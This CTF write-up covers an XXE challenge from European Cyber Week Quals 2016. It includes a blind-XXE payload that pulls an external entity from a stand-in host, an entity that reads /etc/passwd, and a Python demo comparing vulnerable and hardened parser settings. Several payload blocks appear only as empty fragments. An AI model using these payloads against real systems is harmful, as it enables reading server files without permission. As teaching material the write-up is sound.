Information#
Version#
| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |
CTF#
- Name : European Cyber Week CTF Quals 2016
- Website : challenge-ecw.fr
- Type : Online
- Format : Jeopardy - Student
Description#
N.A.
Solution#
This one is an XML External Entity ([XXE][xxe]) attack, and Out-Of-Band (OOB) channel exfiltration does not work here.
We are given the following form:
```xml
<contacts>
```
And the following response confirming that the XML request is well formed:
```
Création du fichier ./MNfloDfo.xml
```
We should be able to leak data into the answer banner.
Confirmation that entities are interpreted:
1 |
|
```
Création du fichier ./J2tuDR8g.xml
```
Nice, that's working, so let's try to leak some files:
1 |
=> doesn't work
1 |
=> doesn't work
1 |
=> doesn't work
[...] and we tried a lot of plausible filenames for various operating systems.
But how did we find the right one? The challenge required no logic, only guessing...
I first thought the banner was useless because no file was leaked in it, so I thought it was some blind XXE:
```xml
<!DOCTYPE contacts [ <!ENTITY % pe SYSTEM "http://example.org/xxe_file"> %pe; %param1; ]>
```
xxe_file:
```xml
<!ENTITY % payload SYSTEM "file:///etc/passwd">
```
And I tried a lot...
But no, in fact no file was leakable except flag.txt. It was impossible to find out; it was just guessing, because the rules and description didn't mention any convention.
I spent hours over several days crafting sophisticated blind XXE requests, and it was only a very easy XXE, but the filename had to be guessed; it was easy to think that XXE was not working, as other files were not leaked.
A realistic challenge would have been better.
But indeed some people found it really easily, as flag.txt is common in CTFs.
I insist on the fact that this is only CTF guessing; in real life this never occurs.
Here was the easy XXE:
1 |
|
```
Création du fichier ./WDpFYEM5.xml
```
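The whole challenge comes down to a server-side parser that follows SYSTEM identifiers in the submitted document. The following is an added example, not the challenge's code: a Python check built on the standard library's xml.sax that parses a `<contacts>` document once with external general entities enabled (the vulnerable setting) and once with them disabled (the hardened one), against a constructed flag.txt in a temporary directory, so the same check can be run to confirm a parser configuration does not expand external entities.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data, i.e. what a server would echo back."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks)


def parse_contacts(xml_bytes, resolve_external_entities):
    """Parse the submitted XML and return its text content.

    resolve_external_entities=True mimics a parser that follows SYSTEM
    identifiers (vulnerable); False is the hardened configuration.
    """
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def xxe_demo():
    """Return (vulnerable_output, hardened_output) for the same document."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "flag.txt")
        with open(secret_path, "w") as f:
            f.write("ECW{constructed-sample-flag}")  # constructed, not the real flag
        # Constructed document in the challenge's <contacts> shape: one external
        # general entity whose SYSTEM id is the file, referenced in element text.
        doc = (
            '<?xml version="1.0"?>\n'
            '<!DOCTYPE contacts [ <!ENTITY leak SYSTEM "file://%s"> ]>\n'
            '<contacts><name>&leak;</name></contacts>' % secret_path
        ).encode()
        return parse_contacts(doc, True), parse_contacts(doc, False)


if __name__ == "__main__":
    vuln, safe = xxe_demo()
    print("entities resolved :", repr(vuln))
    print("entities disabled :", repr(safe))
```

With the feature disabled the entity reference is simply skipped, which is why the hardened parse returns no text at all; on a POSIX system the `file://` form matches the one used on this page.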